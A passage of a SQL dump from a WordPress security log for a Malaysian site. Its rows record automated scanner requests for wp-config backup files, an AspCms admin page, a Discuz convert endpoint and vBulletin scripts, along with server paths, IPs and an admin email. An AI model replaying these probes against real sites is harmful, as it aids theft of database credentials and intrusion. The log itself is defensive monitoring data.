14:28:23',35179824,36985800,'https://bintara.com.my/wp-config.php.orig',1,0,'183.110.224.56'),(27356,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.orig\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:36:\"http://bintara.com.my/wp-config.orig\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.orig\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.orig\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIRFVRs5rARLtASNcvnwAAAAAQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.orig\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.orig\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIRFVRs5rARLtASNcvnwAAAAAQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"18004\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.orig\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.orig\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIRFVRs5rARLtASNcvnwAAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569853717.5604\";s:12:\"REQUEST_TIME\";s:10:\"1569853717\";}}','notice','2019-09-30 14:28:40','2019-09-30 14:28:38',35185208,36991296,'https://bintara.com.my/wp-config.orig',1,0,'183.110.224.56'),(27357,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wp-config.php.original\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:44:\"http://bintara.com.my/wp-config.php.original\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wp-config.php.original\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:23:\"/wp-config.php.original\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIRJIJA@BHzIZKM8@MtbAAAARM\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wp-config.php.original\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wp-config.php.original\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIRJIJA@BHzIZKM8@MtbAAAARM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"18994\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wp-config.php.original\";s:10:\"SCRIPT_URL\";s:23:\"/wp-config.php.original\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIRJIJA@BHzIZKM8@MtbAAAARM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569853733.0488\";s:12:\"REQUEST_TIME\";s:10:\"1569853733\";}}','notice','2019-09-30 14:28:55','2019-09-30 14:28:53',35179824,36985776,'https://bintara.com.my/wp-config.php.original',1,0,'183.110.224.56'),(27358,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/wp-config.original\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:40:\"http://bintara.com.my/wp-config.original\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.original\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/wp-config.original\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIRM4JA@BHzIZKM8@MtcAAAAQI\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.original\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/wp-config.original\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIRM4JA@BHzIZKM8@MtcAAAAQI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.110.224.56\";s:11:\"REMOTE_PORT\";s:5:\"19938\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.original\";s:10:\"SCRIPT_URL\";s:19:\"/wp-config.original\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIRM4JA@BHzIZKM8@MtcAAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569853747.966\";s:12:\"REQUEST_TIME\";s:10:\"1569853747\";}}','notice','2019-09-30 14:29:10','2019-09-30 14:29:08',35179824,36985800,'https://bintara.com.my/wp-config.original',1,0,'183.110.224.56'),(27359,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZInIo3U6542i46IOG7GPwAAAFQ\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:12:\"23.247.81.45\";s:11:\"REMOTE_PORT\";s:5:\"60068\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZInIo3U6542i46IOG7GPwAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569859362.5624\";s:12:\"REQUEST_TIME\";s:10:\"1569859362\";}}','notice','2019-09-30 16:02:45','2019-09-30 16:02:43',35485400,37284376,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'23.247.81.45'),(27360,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZInKo3U6542i46IOG7GRgAAAFc\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZInKo3U6542i46IOG7GRgAAAFc\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:12:\"23.247.81.45\";s:11:\"REMOTE_PORT\";s:5:\"59685\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZInKo3U6542i46IOG7GRgAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569859370.9137\";s:12:\"REQUEST_TIME\";s:10:\"1569859370\";}}','notice','2019-09-30 16:02:53','2019-09-30 16:02:51',35516352,37323408,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'23.247.81.45'),(27361,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/vb/js/ajax.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/vb/js/ajax.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/vb/js/ajax.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIqDY3U6542i46IOG7GsAAAAFE\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/vb/js/ajax.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/vb/js/ajax.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIqDY3U6542i46IOG7GsAAAAFE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"42632\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/vb/js/ajax.js\";s:10:\"SCRIPT_URL\";s:14:\"/vb/js/ajax.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIqDY3U6542i46IOG7GsAAAAFE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569860109.9604\";s:12:\"REQUEST_TIME\";s:10:\"1569860109\";}}','notice','2019-09-30 16:15:12','2019-09-30 16:15:10',35180040,36984128,'https://bintara.com.my/vb/js/ajax.js',1,0,'51.255.43.81'),(27362,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/forums/js/ajax.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/forums/js/ajax.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/forums/js/ajax.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIqG4JA@BHzIZKM8@MxggAAARU\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/forums/js/ajax.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/forums/js/ajax.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIqG4JA@BHzIZKM8@MxggAAARU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"43800\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/forums/js/ajax.js\";s:10:\"SCRIPT_URL\";s:18:\"/forums/js/ajax.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIqG4JA@BHzIZKM8@MxggAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569860123.4638\";s:12:\"REQUEST_TIME\";s:10:\"1569860123\";}}','notice','2019-09-30 16:15:26','2019-09-30 16:15:24',35183752,36987144,'https://bintara.com.my/forums/js/ajax.js',1,0,'51.255.43.81'),(27363,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/vBulletin/js/ajax.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/vBulletin/js/ajax.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/vBulletin/js/ajax.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZIqeK8iH4NZMSdRWsZxDAAAAMA\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/vBulletin/js/ajax.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/vBulletin/js/ajax.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIqeK8iH4NZMSdRWsZxDAAAAMA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"53324\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/vBulletin/js/ajax.js\";s:10:\"SCRIPT_URL\";s:21:\"/vBulletin/js/ajax.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIqeK8iH4NZMSdRWsZxDAAAAMA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569860216.1688\";s:12:\"REQUEST_TIME\";s:10:\"1569860216\";}}','notice','2019-09-30 16:16:58','2019-09-30 